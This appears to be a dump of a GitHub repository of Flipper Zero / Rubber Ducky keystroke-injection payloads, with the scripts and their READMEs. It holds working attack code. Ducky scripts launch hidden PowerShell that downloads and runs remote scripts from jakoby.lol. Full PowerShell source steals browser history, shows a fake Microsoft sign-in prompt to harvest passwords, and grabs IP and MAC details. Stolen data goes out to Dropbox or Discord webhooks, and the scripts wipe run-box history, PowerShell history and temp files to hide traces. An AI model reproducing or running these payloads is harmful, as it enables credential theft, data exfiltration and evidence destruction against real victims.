(Get-PSreadlineOption).HistorySavePath\n\n# Deletes contents of recycle bin\n\nClear-RecycleBin -Force -ErrorAction SilentlyContinue\n\n#----------------------------------------------------------------------------------------------------\n\n# This script repeatedly presses the capslock button, this snippet will make sure capslock is turned back off\n\nAdd-Type -AssemblyName System.Windows.Forms\n$caps = [System.Windows.Forms.Control]::IsKeyLocked('CapsLock')\n\n#If true, toggle CapsLock key, to ensure that the script doesn't fail\nif ($caps -eq $true){\n\n$key = New-Object -ComObject WScript.Shell\n$key.SendKeys('{CapsLock}')\n}\n" }, { "path": "Payloads/Flip-AcidBurn/AcidBurn.txt", "content": "REM Title: AcidBurn\n\nREM Author: I am Jakoby\n\nREM Description: This payload is meant to torment your target to the fullest extent. Mission to recon then roast. See README.md for more details\n\nREM Target: Windows 10, 11\n\nREM --------------------------------------------------------------------------------------\nREM THIS PAYLOAD IS PLUG AND PLAY. NO MODIFICATIONS NEEDED SIMPLY RUN THE CODE DOWN BELOW.\nREM --------------------------------------------------------------------------------------\n\nGUI r\nDELAY 500\nSTRING powershell -w h -NoP -NonI -Ep Bypass irm https://jakoby.lol/zyg | iex\nENTER\n" }, { "path": "Payloads/Flip-AcidBurn/README.md", "content": "![Logo](https://github.com/I-Am-Jakoby/hak5-submissions/blob/main/Assets/logo-170-px.png?raw=true)\n\n\n
\n Table of Contents\n
    \n
  1. Description
    2. \n
  2. Getting Started
    3. \n
  3. Contributing
    4. \n
  4. Version History
    5. \n
  5. Contact
    6. \n
  6. Acknowledgments
    7. \n
\n
\n\n# Acid Burn\n\nA script I put together to torment Call Center Scammers but can be used on your friends as well...or foes.\n\n## Description\n\nThis program enumerates a target PC to include Operating System, RAM Capacity, Public IP, and Email associated with the Microsoft account.\nThe SSID and WiFi password of any current or previously connected to networks.\nIt determines the last day they changed their password and how many days ago.\nOnce the information is gathered, the script will pause until a mouse movement is detected.\nThen, the script uses Sapi speak to roast their set up and lack of security.\nIf wifi networks and passwords are detected, the wallpaper will be changed to an image displaying that information.\nThe generated image will be saved to the desktop and steganography is used to put a hidden message at the bottom of the binary output of the generated image.\n\n## Getting Started\n\n### Dependencies\n\n* Windows 10,11\n\n

(back to top)

\n\n### Executing program\n\n```\npowershell -w h -NoP -NonI -Exec Bypass irm jakoby.lol/zyg | iex\n```\n\n* Invoke-WebRequest will be entered in the Run Box to download and execute the script from memory\n* Enumerate and get Full Name, Amount of RAM, Public IP, Wifi Password Length, Wifi Networks and Passwords, Day Password was last changed, Email\n* Custom responses have been programmed to roast the target based on the information gathered during enumeration phase \n* Wifi Networks and passwords will be generated into an image that will be saved on the desktop\n* Image opened in notepad will reveal a hidden message at the bottom of the binary output\n* Script will freeze until a mouse movement is detected \n* Sapi Speak will be used to speak out loud the custom responses \n* Desktop wallpaper will be changed to the image of the targets Wifi Networks and Passwords\n* Text file will be left on the target desktop with whatever message you choose\n\n![alt text](https://github.com/I-Am-Jakoby/hak5-submissions/blob/main/RubberDucky/Payloads/RD-AcidBurn/hacked-wallpaper.jpg)\n\n

(back to top)

\n\n## Contributing\n\nAll contributors names will be listed here\n\nI am Jakoby\n\nArf\n\n

(back to top)

\n\n## Version History\n\n* 0.1\n * Initial Release\n\n

(back to top)

\n\n\n## Contact\n\n

πŸ“± My Socials πŸ“±

\n
\n\n \n \n \n \n \n \n \n
\n \n \"C#\"\n \n
YouTube\n 		\n \n \"Python\"\n \n
Twitter\n 		\n \n \"Golang\"\n \n
Instagram\n 		\n \n \"Jsonnet\"\n \n
Discord\n 		\n \n \"Jsonnet\"\n \n
TikTok\n
\n
\n\n\n\n

(back to top)

\n\n\n## Acknowledgments\n\n* [Hak5](https://hak5.org/)\n* [MG](https://github.com/OMG-MG)\n* [0iphor13](https://github.com/0iphor13)\n* [PhilSutter](https://github.com/PhilSutter)\n\n\n

(back to top)

\n" }, { "path": "Payloads/Flip-BrowserData/README.md", "content": "![Logo](https://github.com/I-Am-Jakoby/hak5-submissions/blob/main/Assets/logo-170-px.png?raw=true)\n\n\n
\n Table of Contents\n
    \n
  1. Description
    2. \n
  2. The Function
    3. \n
  3. Contact
    4. \n
  4. Acknowledgments
    5. \n
\n
\n\n# Get-BrowserData\n\n

\n \n \"Python\"\n \n
YouTube Tutorial\t\n

\n\n## Description\n\nThis payload can be used to retrieve the browsing history and bookmarks from Edge, Chrome, Opera GX, and Firefox (no bookmarks from firefox currently).\n\nThey are then exfiled using either Discord or Dropbox.\n\n## The Function\n\n### [Get-BrowserData] \n\n* Plug in your device\n* Invoke-WebRequest will be entered in the Run Box to download and execute the script from memory\n* You no longer need to host your own version of this script\n* $db is the variable that holds your DropBox token\n* $dc is the variable that holds your Discord webhook\n* Fill in either variable or both to set your exfil method\n\nSYNTAX:\n\n```\npowershell -w h -ep bypass $dc='';$db='';irm https://jakoby.lol/hgw | iex\n```\n\n\n## Contact\n\n

πŸ“± My Socials πŸ“±

\n
\n\n \n \n \n \n \n \n
\n \n \"C#\"\n \n
YouTube\n 		\n \n \"Python\"\n \n
Twitter\n 		\n \n \"Golang\"\n \n
Instagram\n 		\n \n \"Jsonnet\"\n \n
Discord\n
\n
\n\n\n\n

(back to top)

\n\n\n## Acknowledgments\n\n* [Hak5](https://hak5.org/)\n* [UberGuidoZ](https://github.com/UberGuidoZ)\n" }, { "path": "Payloads/Flip-BrowserData/browserData.ps1", "content": "function Get-BrowserData {\n\n [CmdletBinding()]\n param (\t\n [Parameter (Position=1,Mandatory = $True)]\n [string]$Browser, \n [Parameter (Position=1,Mandatory = $True)]\n [string]$DataType \n ) \n\n $Regex = '(http|https)://([\\w-]+\\.)+[\\w-]+(/[\\w- ./?%&=]*)*?'\n\n if ($Browser -eq 'chrome' -and $DataType -eq 'history' ) {$Path = \"$Env:USERPROFILE\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\History\"}\n elseif ($Browser -eq 'chrome' -and $DataType -eq 'bookmarks' ) {$Path = \"$Env:USERPROFILE\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Bookmarks\"}\n elseif ($Browser -eq 'edge' -and $DataType -eq 'history' ) {$Path = \"$Env:USERPROFILE\\AppData\\Local\\Microsoft/Edge/User Data/Default/History\"}\n elseif ($Browser -eq 'edge' -and $DataType -eq 'bookmarks' ) {$Path = \"$env:USERPROFILE/AppData/Local/Microsoft/Edge/User Data/Default/Bookmarks\"}\n elseif ($Browser -eq 'firefox' -and $DataType -eq 'history' ) {$Path = \"$Env:USERPROFILE\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\*.default-release\\places.sqlite\"}\n elseif ($Browser -eq 'opera' -and $DataType -eq 'history' ) {$Path = \"$Env:USERPROFILE\\AppData\\Roaming\\Opera Software\\Opera GX Stable\\History\"}\n elseif ($Browser -eq 'opera' -and $DataType -eq 'history' ) {$Path = \"$Env:USERPROFILE\\AppData\\Roaming\\Opera Software\\Opera GX Stable\\Bookmarks\"}\n\n $Value = Get-Content -Path $Path | Select-String -AllMatches $regex |% {($_.Matches).Value} |Sort -Unique\n $Value | ForEach-Object {\n $Key = $_\n if ($Key -match $Search){\n New-Object -TypeName PSObject -Property @{\n User = $env:UserName\n Browser = $Browser\n DataType = $DataType\n Data = $_\n }\n }\n } \n}\n\nGet-BrowserData -Browser \"edge\" -DataType \"history\" >> $env:TMP\\--BrowserData.txt\n\nGet-BrowserData -Browser \"edge\" -DataType \"bookmarks\" >> $env:TMP\\--BrowserData.txt\n\nGet-BrowserData -Browser \"chrome\" -DataType \"history\" >> $env:TMP\\--BrowserData.txt\n\nGet-BrowserData -Browser \"chrome\" -DataType \"bookmarks\" >> $env:TMP--BrowserData.txt\n\nGet-BrowserData -Browser \"firefox\" -DataType \"history\" >> $env:TMP\\--BrowserData.txt\n\nGet-BrowserData -Browser \"opera\" -DataType \"history\" >> $env:TMP\\--BrowserData.txt\n\nGet-BrowserData -Browser \"opera\" -DataType \"bookmarks\" >> $env:TMP\\--BrowserData.txt\n\n# Upload output file to dropbox\n\nfunction DropBox-Upload {\n\n[CmdletBinding()]\nparam (\n\t\n[Parameter (Mandatory = $True, ValueFromPipeline = $True)]\n[Alias(\"f\")]\n[string]$SourceFilePath\n) \n$outputFile = Split-Path $SourceFilePath -leaf\n$TargetFilePath=\"/$outputFile\"\n$arg = '{ \"path\": \"' + $TargetFilePath + '\", \"mode\": \"add\", \"autorename\": true, \"mute\": false }'\n$authorization = \"Bearer \" + $db\n$headers = New-Object \"System.Collections.Generic.Dictionary[[String],[String]]\"\n$headers.Add(\"Authorization\", $authorization)\n$headers.Add(\"Dropbox-API-Arg\", $arg)\n$headers.Add(\"Content-Type\", 'application/octet-stream')\nInvoke-RestMethod -Uri https://content.dropboxapi.com/2/files/upload -Method Post -InFile $SourceFilePath -Headers $headers\n}\n\nif (-not ([string]::IsNullOrEmpty($db))){DropBox-Upload -f $env:TMP\\--BrowserData.txt}\n\n#------------------------------------------------------------------------------------------------------------------------------------\n\nfunction Upload-Discord {\n\n[CmdletBinding()]\nparam (\n [parameter(Position=0,Mandatory=$False)]\n [string]$file,\n [parameter(Position=1,Mandatory=$False)]\n [string]$text \n)\n\n$hookurl = \"$dc\"\n\n$Body = @{\n 'username' = $env:username\n 'content' = $text\n}\n\nif (-not ([string]::IsNullOrEmpty($text))){\nInvoke-RestMethod -ContentType 'Application/Json' -Uri $hookurl -Method Post -Body ($Body | ConvertTo-Json)};\n\nif (-not ([string]::IsNullOrEmpty($file))){curl.exe -F \"file1=@$file\" $hookurl}\n}\n\nif (-not ([string]::IsNullOrEmpty($dc))){Upload-Discord -file $env:TMP\\--BrowserData.txt}\n\n\n############################################################################################################################################################\nRI $env:TEMP/--BrowserData.txt\n" }, { "path": "Payloads/Flip-BrowserData/browserData.txt", "content": "REM Title: Browser-Data\n\nREM Author: I am Jakoby\n\nREM Description: This payload will grab your targets brosing history and bookmarks from IE, Chrome, Firefox, and Opera GX.\n\nREM Target: Windows 10, 11\n\nGUI r\nDELAY 500\nSTRING powershell -w h -ep bypass $dc='';$db='';irm https://jakoby.lol/hgw | iex\nENTER\n\nREM Fill in either variable or both to set your exfil method.\nREM $db is the variable that holds your DropBox token.\nREM $dc is the variable that holds your Discord webhook. \nREM If you are using DropBox, also remember to replace ?dl=0 with ?dl=1 at the end of your link so it is executed properly.\n" }, { "path": "Payloads/Flip-Credz-Plz/Credz-Plz-Execute.txt", "content": "REM Title: Credz-Plz\n\nREM Author: I am Jakoby\n\nREM Description: This payload prompts the target to enter their creds to later be exfiltrated with either Dropbox or a Discord webhook.\n\nREM See README.md file for more details.\n\nREM Target: Windows 10, 11\n\nGUI r\nDELAY 500\nSTRING powershell -w h -ep bypass $dc='';$db='';irm https://jakoby.lol/35k | iex\nENTER\n\nREM Fill in either variable or both to set your exfil method.\nREM $db is the variable that holds your DropBox token.\nREM $dc is the variable that holds your Discord webhook. \nREM If you are using DropBox, also remember to replace ?dl=0 with ?dl=1 at the end of your link so it is executed properly.\n" }, { "path": "Payloads/Flip-Credz-Plz/Credz-Plz.ps1", "content": "############################################################################################################################################################ \n# | ___ _ _ _ # ,d88b.d88b # \n# Title : Credz-Plz | |_ _| __ _ _ __ ___ | | __ _ | | __ ___ | |__ _ _ # 88888888888 # \n# Author : I am Jakoby | | | / _` | | '_ ` _ \\ _ | | / _` | | |/ / / _ \\ | '_ \\ | | | |# `Y8888888Y' # \n# Version : 1.0 | | | | (_| | | | | | | | | |_| | | (_| | | < | (_) | | |_) | | |_| |# `Y888Y' #\n# Category : Credentials | |___| \\__,_| |_| |_| |_| \\___/ \\__,_| |_|\\_\\ \\___/ |_.__/ \\__, |# `Y' #\n# Target : Windows 7,10,11 | |___/ # /\\/|_ __/\\\\ # \n# Mode : HID | |\\__/,| (`\\ # / -\\ /- ~\\ # \n# | My crime is that of curiosity |_ _ |.--.) )# \\ = Y =T_ = / # \n# | and yea curiosity killed the cat ( T ) / # Luther )==*(` `) ~ \\ Hobo # \n# | but satisfaction brought him back (((^_(((/(((_/ # / \\ / \\ # \n#__________________________________|_________________________________________________________________________# | | ) ~ ( #\n# tiktok.com/@i_am_jakoby # / \\ / ~ \\ #\n# github.com/I-Am-Jakoby # \\ / \\~ ~/ # \n# twitter.com/I_Am_Jakoby # /\\_/\\_/\\__ _/_/\\_/\\__~__/_/\\_/\\_/\\_/\\_/\\_# \n# instagram.com/i_am_jakoby # | | | | ) ) | | | (( | | | | | |# \n# youtube.com/c/IamJakoby # | | | |( ( | | | \\\\ | | | | | |#\n############################################################################################################################################################\n\n<#\n.SYNOPSIS\n\tThis script is meant to trick your target into sharing their credentials through a fake authentication pop up message\n\n.DESCRIPTION \n\tA pop up box will let the target know \"Unusual sign-in. Please authenticate your Microsoft Account\"\n\tThis will be followed by a fake authentication ui prompt. \n\tIf the target tried to \"X\" out, hit \"CANCEL\" or while the password box is empty hit \"OK\" the prompt will continuously re pop up \n\tOnce the target enters their credentials their information will be uploaded to either your Dropbox or Discord webhook for collection\n\n.Link\n\thttps://developers.dropbox.com/oauth-guide\t\t# Guide for setting up your DropBox for uploads\n\n#>\n\n#------------------------------------------------------------------------------------------------------------------------------------\n# This is for if you want to host your own version of the script\n\n# $db = \"YOUR-DROPBOX-ACCESS-TOKEN\"\n\n# $dc = \"YOUR-DISCORD-WEBHOOK\"\n\n#------------------------------------------------------------------------------------------------------------------------------------\n\n$FileName = \"$env:USERNAME-$(get-date -f yyyy-MM-dd_hh-mm)_User-Creds.txt\"\n\n#------------------------------------------------------------------------------------------------------------------------------------\n\n<#\n\n.NOTES \n\tThis is to generate the ui.prompt you will use to harvest their credentials\n#>\n\nfunction Get-Creds {\n\n $form = $null\n\n while ($form -eq $null)\n {\n $cred = $host.ui.promptforcredential('Failed Authentication','',[Environment]::UserDomainName+'\\'+[Environment]::UserName,[Environment]::UserDomainName); \n $cred.getnetworkcredential().password\n\n if([string]::IsNullOrWhiteSpace([Net.NetworkCredential]::new('', $cred.Password).Password))\n {\n if(-not ([AppDomain]::CurrentDomain.GetAssemblies() | Where-Object { $_.ManifestModule -like \"*PresentationCore*\" -or $_.ManifestModule -like \"*PresentationFramework*\" }))\n {\n Add-Type -AssemblyName PresentationCore,PresentationFramework\n }\n\n $msgBody = \"Credentials cannot be empty!\"\n $msgTitle = \"Error\"\n $msgButton = 'Ok'\n $msgImage = 'Stop'\n $Result = [System.Windows.MessageBox]::Show($msgBody,$msgTitle,$msgButton,$msgImage)\n Write-Host \"The user clicked: $Result\"\n $form = $null\n }\n \n else{\n $creds = $cred.GetNetworkCredential() | fl\n return $creds\n }\n }\n}\n\n#----------------------------------------------------------------------------------------------------\n\n<#\n\n.NOTES \n\tThis is to pause the script until a mouse movement is detected\n#>\n\nfunction Pause-Script{\nAdd-Type -AssemblyName System.Windows.Forms\n$originalPOS = [System.Windows.Forms.Cursor]::Position.X\n$o=New-Object -ComObject WScript.Shell\n\n while (1) {\n $pauseTime = 3\n if ([Windows.Forms.Cursor]::Position.X -ne $originalPOS){\n break\n }\n else {\n $o.SendKeys(\"{CAPSLOCK}\");Start-Sleep -Seconds $pauseTime\n }\n }\n}\n\n#----------------------------------------------------------------------------------------------------\n\n# This script repeadedly presses the capslock button, this snippet will make sure capslock is turned back off \n\nfunction Caps-Off {\nAdd-Type -AssemblyName System.Windows.Forms\n$caps = [System.Windows.Forms.Control]::IsKeyLocked('CapsLock')\n\n#If true, toggle CapsLock key, to ensure that the script doesn't fail\nif ($caps -eq $true){\n\n$key = New-Object -ComObject WScript.Shell\n$key.SendKeys('{CapsLock}')\n}\n}\n#----------------------------------------------------------------------------------------------------\n\n<#\n\n.NOTES \n\tThis is to call the function to pause the script until a mouse movement is detected then activate the pop-up\n#>\n\nPause-Script\n\nCaps-Off\n\nAdd-Type -AssemblyName PresentationCore,PresentationFramework\n$msgBody = \"Please authenticate your Microsoft Account.\"\n$msgTitle = \"Authentication Required\"\n$msgButton = 'Ok'\n$msgImage = 'Warning'\n$Result = [System.Windows.MessageBox]::Show($msgBody,$msgTitle,$msgButton,$msgImage)\nWrite-Host \"The user clicked: $Result\"\n\n$creds = Get-Creds\n\n#------------------------------------------------------------------------------------------------------------------------------------\n\n<#\n\n.NOTES \n\tThis is to save the gathered credentials to a file in the temp directory\n#>\n\necho $creds >> $env:TMP\\$FileName\n\n#------------------------------------------------------------------------------------------------------------------------------------\n\n<#\n\n.NOTES \n\tThis is to upload your files to dropbox\n#>\n\nfunction DropBox-Upload {\n\n[CmdletBinding()]\nparam (\n\t\n[Parameter (Mandatory = $True, ValueFromPipeline = $True)]\n[Alias(\"f\")]\n[string]$SourceFilePath\n) \n$outputFile = Split-Path $SourceFilePath -leaf\n$TargetFilePath=\"/$outputFile\"\n$arg = '{ \"path\": \"' + $TargetFilePath + '\", \"mode\": \"add\", \"autorename\": true, \"mute\": false }'\n$authorization = \"Bearer \" + $db\n$headers = New-Object \"System.Collections.Generic.Dictionary[[String],[String]]\"\n$headers.Add(\"Authorization\", $authorization)\n$headers.Add(\"Dropbox-API-Arg\", $arg)\n$headers.Add(\"Content-Type\", 'application/octet-stream')\nInvoke-RestMethod -Uri https://content.dropboxapi.com/2/files/upload -Method Post -InFile $SourceFilePath -Headers $headers\n}\n\nif (-not ([string]::IsNullOrEmpty($db))){DropBox-Upload -f $env:TMP\\$FileName}\n\n#------------------------------------------------------------------------------------------------------------------------------------\n\nfunction Upload-Discord {\n\n[CmdletBinding()]\nparam (\n [parameter(Position=0,Mandatory=$False)]\n [string]$file,\n [parameter(Position=1,Mandatory=$False)]\n [string]$text \n)\n\n$hookurl = \"$dc\"\n\n$Body = @{\n 'username' = $env:username\n 'content' = $text\n}\n\nif (-not ([string]::IsNullOrEmpty($text))){\nInvoke-RestMethod -ContentType 'Application/Json' -Uri $hookurl -Method Post -Body ($Body | ConvertTo-Json)};\n\nif (-not ([string]::IsNullOrEmpty($file))){curl.exe -F \"file1=@$file\" $hookurl}\n}\n\nif (-not ([string]::IsNullOrEmpty($dc))){Upload-Discord -file $env:TMP\\$FileName}\n\n#------------------------------------------------------------------------------------------------------------------------------------\n\n<#\n\n.NOTES \n\tThis is to clean up behind you and remove any evidence to prove you were there\n#>\n\n# Delete contents of Temp folder \n\nrm $env:TEMP\\* -r -Force -ErrorAction SilentlyContinue\n\n# Delete run box history\n\nreg delete HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\RunMRU /va /f\n\n# Delete powershell history\n\nRemove-Item (Get-PSreadlineOption).HistorySavePath\n\n# Deletes contents of recycle bin\n\nClear-RecycleBin -Force -ErrorAction SilentlyContinue\n\nexit\n\n" }, { "path": "Payloads/Flip-Credz-Plz/README.md", "content": "![Logo](https://github.com/I-Am-Jakoby/hak5-submissions/blob/main/Assets/logo-170-px.png?raw=true)\n\n\n
\n Table of Contents\n
    \n
  1. Description
    2. \n
  2. Getting Started
    3. \n
  3. Contributing
    4. \n
  4. Version History
    5. \n
  5. Contact
    6. \n
  6. Acknowledgments
    7. \n
\n
\n\n# Credz-Plz\n\nA script used to prompt the target to enter their creds to later be exfiltrated with either Dropbox or a Discord webhook.\n\n## Description\n\nA pop up box will let the target know \"Unusual sign-in. Please authenticate your Microsoft Account\".\nThis will be followed by a fake authentication ui prompt. \nIf the target tried to \"X\" out, hit \"CANCEL\" or while the password box is empty hit \"OK\" the prompt will continuously re pop up.\nOnce the target enters their credentials their information will be uploaded to your Dropbox or Discord webhook for collection.\n\n![alt text](https://i.imgur.com/mudQcIh.png)\n\n![alt text](https://i.imgur.com/3JqE7a8.png)\n\n## Getting Started\n\n### Dependencies\n\n* DropBox or other file sharing service - Your Shared link for the intended file\n* Windows 10,11\n\n

(back to top)

\n\n### Executing program\n\n* Plug in your device\n* Invoke-WebRequest will be entered in the Run Box to download and execute the script from memory\n* You no longer need to host your own version of this script \n* `$db` is the variable that holds your DropBox token\n* `$dc` is the variable that holds your Discord webhook \n* Fill in either variable or both to set your exfil method\n\n```\npowershell -w h -ep bypass $dc='';$db='';irm https://jakoby.lol/35k | iex\n```\n\n

(back to top)

\n\n## Contributing\n\nAll contributors names will be listed here\n\nI am Jakoby\n\n

(back to top)

\n\n## Version History\n\n* 0.1\n * Initial Release\n\n

(back to top)

\n\n\n## Contact\n\n

πŸ“± My Socials πŸ“±

\n
\n\n \n \n \n \n \n \n \n
\n \n \"C#\"\n \n
YouTube\n 		\n \n \"Python\"\n \n
Twitter\n 		\n \n \"Golang\"\n \n
Instagram\n 		\n \n \"Jsonnet\"\n \n
Discord\n 		\n \n \"Jsonnet\"\n \n
TikTok\n
\n
\n\n\n\n

(back to top)

\n\n\n## Acknowledgments\n\n* [Hak5](https://hak5.org/)\n* [MG](https://github.com/OMG-MG)\n\n

(back to top)

\n" }, { "path": "Payloads/Flip-EvilGoose/EvilGoose.txt", "content": "REM Title: Hacker Goose\n\nREM Author: I am Jakoby\n\nREM Description: A payload that hires a goose to hack your target in real time\n\nREM Target: Windows 10, 11\n\nGUI r\nDELAY 500\nSTRING powershell -w h -NoP -NonI -Ep Bypass $D=\"$env:tmp\";iwr -Uri 'https://jakoby.lol/1ae' -O \"$D\\hg.zip\";Expand-Archive \"$D\\hg.zip\" -Des $D -Force;. \"$D\\hg\\main.ps1\"\nENTER\n" }, { "path": "Payloads/Flip-EvilGoose/ReadMe.md", "content": "![Logo](https://github.com/I-Am-Jakoby/hak5-submissions/blob/main/Assets/logo-170-px.png?raw=true)\n\n\n
\n Table of Contents\n
    \n
  1. Description
    2. \n
  2. Getting Started
    3. \n
  3. Contributing
    4. \n
  4. Version History
    5. \n
  5. Contact
    6. \n
  6. Acknowledgments
    7. \n
\n
\n\n# Evil Goose\n\nA payload that hires a goose to hack your target in real time\n\n## Description\n\nWith this payload after is is executed it will wait for a mouse movement to begin \n\nAfterwards it will walk around your targets screen pulling out personal information about them such as: \n\n* Full name associated with their microsoft account \n* Email associated with their microsoft account \n* Their exact Geo Location \n* The wifi networks and passwords\n\n## Getting Started\n\n### Dependencies\n\n* Windows 10,11\n\n

(back to top)

\n\n### Executing program\n\n* Plug in your device\n* 10 seconds later your goose is owning their system\n\n```powershell\npowershell -w h -NoP -NonI -Ep Bypass $D=\"$env:tmp\";iwr -Uri 'https://jakoby.lol/1ae' -O \"$D\\hg.zip\";Expand-Archive \"$D\\hg.zip\" -Des $D -Force;. \"$D\\hg\\main.ps1\"\n```\n### Exiting the Payload\n\nThis payload will automatically end after 2 min \n\nOr if you press `Left Control` + `Right Control` at the same time\n\n

(back to top)

\n\n## Contributing\n\nAll contributors names will be listed here\n\nI am Jakoby\n\n

(back to top)

\n\n## Version History\n\n* 0.1\n * Initial Release\n\n

(back to top)

\n\n\n## Contact\n\n

πŸ“± My Socials πŸ“±

\n
\n\n \n \n \n \n \n \n \n
\n \n \"C#\"\n \n
YouTube\n 		\n \n \"Python\"\n \n
Twitter\n 		\n \n \"Golang\"\n \n
Instagram\n 		\n \n \"Jsonnet\"\n \n
Discord\n 		\n \n \"Jsonnet\"\n \n
TikTok\n
\n
\n\n\n\n

(back to top)

\n\n\n## Acknowledgments\n\n* [Hak5](https://hak5.org/)\n* [MG](https://github.com/OMG-MG)\n\n

(back to top)

\n" }, { "path": "Payloads/Flip-EvilGoose/placeholder", "content": "\n" }, { "path": "Payloads/Flip-IP-Grabber/IP-Grabber.ps1", "content": "$FileName = \"$env:tmp/$env:USERNAME-LOOT-$(get-date -f yyyy-MM-dd_hh-mm).txt\"\n\n#------------------------------------------------------------------------------------------------------------------------------------\n\nfunction Get-fullName {\n\n try {\n $fullName = (Get-LocalUser -Name $env:USERNAME).FullName\n }\n \n # If no name is detected function will return $env:UserName \n\n # Write Error is just for troubleshooting \n catch {Write-Error \"No name was detected\" \n return $env:UserName\n -ErrorAction SilentlyContinue\n }\n\n return $fullName \n\n}\n\n$fullName = Get-fullName\n\n\n#------------------------------------------------------------------------------------------------------------------------------------\n\nfunction Get-email {\n \n try {\n\n $email = (Get-CimInstance CIM_ComputerSystem).PrimaryOwnerName\n return $email\n }\n\n# If no email is detected function will return backup message for sapi speak\n\n # Write Error is just for troubleshooting\n catch {Write-Error \"An email was not found\" \n return \"No Email Detected\"\n -ErrorAction SilentlyContinue\n } \n}\n\n$email = Get-email\n\n#------------------------------------------------------------------------------------------------------------------------------------\n\n\ntry{$computerPubIP=(Invoke-WebRequest ipinfo.io/ip -UseBasicParsing).Content}\ncatch{$computerPubIP=\"Error getting Public IP\"}\n\n\n\n$localIP = Get-NetIPAddress -InterfaceAlias \"*Ethernet*\",\"*Wi-Fi*\" -AddressFamily IPv4 | Select InterfaceAlias, IPAddress, PrefixOrigin | Out-String\n\n$MAC = Get-NetAdapter -Name \"*Ethernet*\",\"*Wi-Fi*\"| Select Name, MacAddress, Status | Out-String\n\n#------------------------------------------------------------------------------------------------------------------------------------\n\n\n$output = @\"\n\nFull Name: $fullName\n\nEmail: $email\n\n------------------------------------------------------------------------------------------------------------------------------\nPublic IP: \n$computerPubIP\n\nLocal IPs:\n$localIP\n\nMAC:\n$MAC\n\n\"@\n\n$output > $FileName\n\n#------------------------------------------------------------------------------------------------------------------------------------\n\nfunction Upload-Discord {\n\n[CmdletBinding()]\nparam (\n [parameter(Position=0,Mandatory=$False)]\n [string]$file,\n [parameter(Position=1,Mandatory=$False)]\n [string]$text \n)\n\n$hookurl = \"$dc\"\n\n$Body = @{\n 'username' = $env:username\n 'content' = $text\n}\n\nif (-not ([string]::IsNullOrEmpty($text))){\nInvoke-RestMethod -ContentType 'Application/Json' -Uri $hookurl -Method Post -Body ($Body | ConvertTo-Json)};\n\nif (-not ([string]::IsNullOrEmpty($file))){curl.exe -F \"file1=@$file\" $hookurl}\n}\n\nif (-not ([string]::IsNullOrEmpty($dc))){Upload-Discord -file \"$FileName\"}\n\n\n#------------------------------------------------------------------------------------------------------------------------------------\n\nfunction DropBox-Upload {\n\n[CmdletBinding()]\nparam (\n\t\n[Parameter (Mandatory = $True, ValueFromPipeline = $True)]\n[Alias(\"f\")]\n[string]$SourceFilePath\n) \n$outputFile = Split-Path $SourceFilePath -leaf\n$TargetFilePath=\"/$outputFile\"\n$arg = '{ \"path\": \"' + $TargetFilePath + '\", \"mode\": \"add\", \"autorename\": true, \"mute\": false }'\n$authorization = \"Bearer \" + $db\n$headers = New-Object \"System.Collections.Generic.Dictionary[[String],[String]]\"\n$headers.Add(\"Authorization\", $authorization)\n$headers.Add(\"Dropbox-API-Arg\", $arg)\n$headers.Add(\"Content-Type\", 'application/octet-stream')\nInvoke-RestMethod -Uri https://content.dropboxapi.com/2/files/upload -Method Post -InFile $SourceFilePath -Headers $headers\n}\n\nif (-not ([string]::IsNullOrEmpty($db))){DropBox-Upload -f $FileName}\n" }, { "path": "Payloads/Flip-IP-Grabber/IP-Grabber.txt", "content": "REM Title: IP-Grabber\n\nREM Author: I am Jakoby\n\nREM Description: This payload is meant to do grab your targets IP addresses and exfil them\n\nREM Target: Windows 10, 11\n\nGUI r\nDELAY 500\nSTRING powershell -w h -NoP -Ep Bypass $dc='';$db='';irm jakoby.lol/f0x | iex\nENTER\n" }, { "path": "Payloads/Flip-IP-Grabber/ReadMe.md", "content": "![Logo](https://github.com/I-Am-Jakoby/hak5-submissions/blob/main/Assets/logo-170-px.png?raw=true)\n\n\n
\n Table of Contents\n
    \n
  1. Description
    2. \n
  2. Getting Started
    3. \n
  3. Contributing
    4. \n
  4. Version History
    5. \n
  5. Contact
    6. \n
  6. Acknowledgments
    7. \n
\n
\n\n# IP-Grabber\n\n## Description\n\nThis payload is meant to do grab your targets IP addresses and exfil them with discord or dropbox\n\n## Getting Started\n\n### Dependencies\n\n* Windows 10,11\n\n### Executing program\n\n* Plug in your device\n* Invoke-WebRequest will be entered in the Run Box to download and execute the script from memory\n\n`$dc` is the variable that stores your Discord webhook \n\n`$db` is the variable that stores your Dropbox token \n\nFill in either or both of these to methods to exfil your collected data\n\n```\npowershell -w h -NoP -Ep Bypass $dc='';$db='';irm jakoby.lol/f0x | iex\n```\n\n

(back to top)

\n\n## Contributing\n\nAll contributors names will be listed here\n\nI am Jakoby\n\n

(back to top)

\n\n## Version History\n\n* 0.1\n * Initial Release\n\n

(back to top)

\n\n\n## Contact\n\n

πŸ“± My Socials πŸ“±

\n
\n\n \n \n \n \n \n \n \n
\n \n \"C#\"\n \n
YouTube\n 		\n \n \"Python\"\n \n
Twitter\n 		\n \n \"Golang\"\n \n
Instagram\n 		\n \n \"Jsonnet\"\n \n
Discord\n 		\n \n \"Jsonnet\"\n \n
TikTok\n
\n
\n\n\n\n

(back to top)

\n\n\n## Acknowledgments\n\n* [Hak5](https://hak5.org/)\n* [MG](https://github.com/OMG-MG)\n\n

(back to top)

\n" }, { "path": "Payloads/Flip-JumpScare/JumpScare.ps1", "content": "############################################################################################################################################################ \r\n# | ___ _ _ _ # ,d88b.d88b # \r\n# Title : JumpScare | |_ _| __ _ _ __ ___ | | __ _ | | __ ___ | |__ _ _ # 88888888888 # \r\n# Author : I am Jakoby | | | / _` | | '_ ` _ \\ _ | | / _` | | |/ / / _ \\ | '_ \\ | | | |# `Y8888888Y' # \r\n# Version : 1.0 | | | | (_| | | | | | | | | |_| | | (_| | | < | (_) | | |_) | | |_| |# `Y888Y' #\r\n# Category : Prank | |___| \\__,_| |_| |_| |_| \\___/ \\__,_| |_|\\_\\ \\___/ |_.__/ \\__, |# `Y' #\r\n# Target : Windows 10,11 | |___/ # /\\/|_ __/\\\\ # \r\n# Mode : HID | |\\__/,| (`\\ # / -\\ /- ~\\ # \r\n# | My crime is that of curiosity |_ _ |.--.) )# \\ = Y =T_ = / # \r\n# | and yea curiosity killed the cat ( T ) / # Luther )==*(` `) ~ \\ Hobo # \r\n# | but satisfaction brought him back (((^_(((/(((_/ # / \\ / \\ # 